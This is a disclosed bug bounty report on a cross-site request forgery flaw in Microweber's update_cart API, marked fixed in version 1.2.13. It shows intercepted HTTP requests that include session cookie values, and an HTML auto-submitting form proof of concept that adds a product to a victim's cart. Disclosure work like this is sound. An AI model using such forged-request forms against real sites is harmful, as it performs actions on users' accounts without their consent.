CSRF on update cart functionality in microweber/microweber

Valid

Reported on

Mar 31st 2022

I found a CSRF Vulnerability in the update cart functionality where there is no csrf token being validated While updating the cart as the authenticated user

Vulnerable Request:

POST /demo/api/update_cart HTTP/1.1
Host: demo.microweber.org
Cookie: laravel_session=oVrVA2TbkeiJJIMoTt9UgfFU9BzqP41iW8YIIzmy; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/view%3Amodules/load_module%3Ausers/action%3Aprofile; csrf-token-data=%7B%22value%22%3A%22MumtS5v538A6QyfXzmwvx2nhZeXTQSUsQOGQRIwn%22%2C%22expiry%22%3A1648713233295%7D; mw-back-to-live-edit=true; show-sidebar-layouts=0
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 23
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/shop
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

price=199&content_id=12

Steps to Reproduce:

After authentication, click on any product and add it to the cart
Now, Intercept the request and the request looks as follows

Request:

POST /demo/api/update_cart HTTP/1.1
Host: demo.microweber.org
Cookie: laravel_session=oVrVA2TbkeiJJIMoTt9UgfFU9BzqP41iW8YIIzmy; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/view%3Amodules/load_module%3Ausers/action%3Aprofile; csrf-token-data=%7B%22value%22%3A%22MumtS5v538A6QyfXzmwvx2nhZeXTQSUsQOGQRIwn%22%2C%22expiry%22%3A1648713233295%7D; mw-back-to-live-edit=true; show-sidebar-layouts=0
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 23
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/shop
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

price=199&content_id=12

As you can see there is no csrf token being validated, we can create a CSRF proof of concept to make things easier and to validate

CSRF Proof of Concept:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.microweber.org/demo/api/update_cart" method="POST">
      <input type="hidden" name="price" value="199" />
      <input type="hidden" name="content&#95;id" value="12" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Now whoever opens the HTML file and the product will get added to the cart

Impact

An attacker may be able to add their own product to the victim's account by lesser user interaction

Occurrences

index.php L1-L196

CSRF token needs to implemented

We are processing your report and will contact the microweber team within 24 hours. a year ago

We have contacted a member of the microweber team and are waiting to hear back a year ago

We have sent a follow up to the microweber team. We will try again in 7 days. a year ago

Peter Ivanov modified the report

a year ago

Peter Ivanov validated this vulnerability a year ago

Nithissh12 has been awarded the disclosure bounty

The fix bounty is now up for grabs

Peter Ivanov marked this as fixed in 1.2.13 with commit d5635f a year ago

Peter Ivanov has been awarded the fix bounty

This vulnerability will not receive a CVE

index.php#L1-L196 has been validated

to join this conversation